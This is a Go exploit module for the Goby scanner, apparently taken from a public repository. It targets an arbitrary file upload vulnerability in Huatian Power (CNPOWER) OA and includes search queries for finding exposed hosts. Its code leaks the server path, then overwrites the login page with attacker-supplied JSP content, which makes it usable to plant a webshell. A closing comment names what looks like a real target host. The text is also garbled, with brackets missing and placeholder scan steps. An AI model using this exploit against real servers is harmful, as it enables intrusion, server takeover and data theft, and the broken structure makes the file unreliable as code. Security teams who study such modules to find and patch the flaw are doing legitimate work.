Goby/go/CNPOWER OA Arbitrary File U...

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2022-11-25 02:08:58 -08:00
package exploits
import (
func init() {
expJson := `{
"Name": "CNPOWER OA Arbitrary File Upload Vulnerability",
"Description": "<p>Huatian power collaborative office system combines advanced management ideas, management modes, software technology and network technology to provide users with a low-cost and efficient collaborative office and management platform.&nbsp;Wise managers have achieved good results in strengthening standardized workflow, strengthening team execution, promoting fine management and promoting business growth through the use of Huatian power collaborative office platform.<br></p><p>There is an arbitrary file upload vulnerability in Huatian power OA. Attackers can upload arbitrary files, obtain webshell, control server permissions, read sensitive information, etc.<br></p>",
"Product": "CNPOWER-OA",
"Homepage": "http://www.oa8000.com/",
"DisclosureDate": "2022-07-22",
"Author": "toto",
"FofaQuery": "body=\"/OAapp/WebObjects/OAapp.woa\" || body=\"/OAapp/htpages/app\"",
"GobyQuery": "body=\"/OAapp/WebObjects/OAapp.woa\" || body=\"/OAapp/htpages/app\"",
"Level": "2",
"Impact": "<p><span style=\"color: rgb(0, 0, 0); font-size: 16px;\">There is an arbitrary file upload vulnerability in Huatian power OA. Attackers can upload arbitrary files, obtain webshell, control server permissions, read sensitive information, etc.</span><br></p>",
"Recommendation": "<p>The manufacturer has not provided a vulnerability repair plan. Please pay attention to the update of the manufacturer's homepage:</p><p><a href=\"http://www.oa8000.com/\">http://www.oa8000.com/</a></p>",
"References": [
"Is0day": false,
"HasExp": true,
"ExpParams": [
"name": "fileContent",
"type": "input",
"value": "<%out.println(\"123\");%>",
"show": ""
"ExpTips": {
"Type": "",
"Content": ""
"ScanSteps": [
"Request": {
"method": "GET",
"uri": "/test.php",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "test",
"bz": ""
"SetVariable": []
"ExploitSteps": [
"Request": {
"method": "GET",
"uri": "/test.php",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "test",
"bz": ""
"SetVariable": []
"Tags": [
"File Upload"
"VulType": [
"File Upload"
"CVEIDs": [
"CNNVD": [
"CNVD": [
"CVSSScore": "9.8",
"Translation": {
"CN": {
"Name": "华天动力 OA 任意文件上传漏洞",
"Product": "华天动力-OA",
"Description": "<p><span style=\"color: rgb(22, 28, 37); font-size: 16px;\">华天动力协同办公系统将先进的管理思想、管理模式和软件技术、网络技术相结合,为用户提供了低成本、高效能的协同办公和管理平台。睿智的管理者通过使用华天动力协同办公平台,在加强规范工作流程、强化团队执行、推动精细管理、促进营业增长等工作中取得了良好的成效。<br></span></p><p><span style=\"color: rgb(22, 28, 37); font-size: 16px;\">华天动力 OA&nbsp;</span><span style=\"color: rgb(22, 28, 37); font-size: 16px;\">存在任意文件上传漏洞,攻击者可以上传任意文件,获取 webshell控制服务器权限读取敏感信息等。</span><br></p>",
"Recommendation": "<p>目前官方尚未发布安全补丁,请关注厂商更新。<a href=\"http://www.oa8000.com/\">http://www.oa8000.com/</a></p>",
"Impact": "<p>华天动力 OA 存在任意文件上传漏洞,攻击者可以上传任意文件,获取 webshell控制服务器权限读取敏感信息等。</p>",
"VulType": [
"Tags": [
"EN": {
"Name": "CNPOWER OA Arbitrary File Upload Vulnerability",
"Product": "CNPOWER-OA",
"Description": "<p>Huatian power collaborative office system combines advanced management ideas, management modes, software technology and network technology to provide users with a low-cost and efficient collaborative office and management platform.&nbsp;Wise managers have achieved good results in strengthening standardized workflow, strengthening team execution, promoting fine management and promoting business growth through the use of Huatian power collaborative office platform.<br></p><p>There is an arbitrary file upload vulnerability in Huatian power OA. Attackers can upload arbitrary files, obtain webshell, control server permissions, read sensitive information, etc.<br></p>",
"Recommendation": "<p>The manufacturer has not provided a vulnerability repair plan. Please pay attention to the update of the manufacturer's homepage:</p><p><a href=\"http://www.oa8000.com/\">http://www.oa8000.com/</a></p>",
"Impact": "<p><span style=\"color: rgb(0, 0, 0); font-size: 16px;\">There is an arbitrary file upload vulnerability in Huatian power OA. Attackers can upload arbitrary files, obtain webshell, control server permissions, read sensitive information, etc.</span><br></p>",
"VulType": [
"File Upload"
"Tags": [
"File Upload"
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": null,
"System": null,
"Hardware": null
getOAFilePath98234u293 := func(host *httpclient.FixUrl) string {
requestConfig := httpclient.NewPostRequestConfig("/OAapp/jsp/upload.jsp")
requestConfig.VerifyTls = false
requestConfig.FollowRedirect = false
requestConfig.Header.Store("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundary5Ur8laykKAWws2QO")
requestConfig.Data = "------WebKitFormBoundary5Ur8laykKAWws2QO\r\nContent-Disposition: form-data; name=\"file\"; filename=\"xxx.xml\"\r\nContent-Type: image/png\r\n\r\nreal path\r\n------WebKitFormBoundary5Ur8laykKAWws2QO\r\nContent-Disposition: form-data; name=\"filename\"\r\n\r\nxxx.png\r\n------WebKitFormBoundary5Ur8laykKAWws2QO--\r\n"
if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil {
if resp.StatusCode == 200 && strings.Contains(resp.Utf8Html, ".dat") {
if path := regexp.MustCompile(`(.*?)Tomcat/webapps/.*?\.dat`).FindStringSubmatch(resp.RawBody); len(path) > 1 {
// 直接返回文件最后一个 jsessionid
return path[1]
} else if path := regexp.MustCompile(`(.*?)htoadata/appdata/.*?\.dat`).FindStringSubmatch(resp.RawBody); len(path) > 1 {
return path[1]
return ""
exploitUploadFile837276342783 := func(path string, fileContent string, host *httpclient.FixUrl) bool {
requestConfig := httpclient.NewPostRequestConfig("/OAapp/htpages/app/module/trace/component/fileEdit/ntkoupload.jsp")
requestConfig.VerifyTls = false
requestConfig.FollowRedirect = false
requestConfig.Header.Store("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundaryzRSYXfFlXqk6btQm")
requestConfig.Data = "------WebKitFormBoundaryzRSYXfFlXqk6btQm\r\nContent-Disposition: form-data; name=\"EDITFILE\"; filename=\"xxx.txt\"\r\nContent-Type: image/png\r\n\r\n" + fileContent + "\r\n------WebKitFormBoundaryzRSYXfFlXqk6btQm\r\nContent-Disposition: form-data; name=\"newFileName\"\r\n\r\n" + path + "Tomcat/webapps/OAapp/htpages/app/module/login/normalLoginPageForOther.jsp\r\n------WebKitFormBoundaryzRSYXfFlXqk6btQm--\r\n"
if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil {
return resp.StatusCode == 200
return false
checkUploadedFile2398764278 := func(fileContent string, host *httpclient.FixUrl) bool {
requestConfig := httpclient.NewGetRequestConfig("/OAapp/htpages/app/module/login/normalLoginPageForOther.jsp")
requestConfig.VerifyTls = false
requestConfig.FollowRedirect = false
if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil {
return resp.StatusCode == 200 && strings.Contains(resp.RawBody, fileContent)
return false
func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool {
path := getOAFilePath98234u293(u)
if path == "" {
path = "D:/htoa/"
rand := goutils.RandomHexString(6)
if exploitUploadFile837276342783(path, "<%out.print(\""+rand+"\");%>", u) {
return checkUploadedFile2398764278(rand, u)
return false
func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult {
fileContent := ss.Params["fileContent"].(string)
path := getOAFilePath98234u293(expResult.HostInfo)
if path == "" {
path = "D:/htoa/"
if exploitUploadFile837276342783(path, fileContent, expResult.HostInfo) {
expResult.Success = true
expResult.Output = "文件已上传,请访问:/OAapp/htpages/app/module/login/normalLoginPageForOther.jsp"
return expResult
// http://winnertoke.com:6001/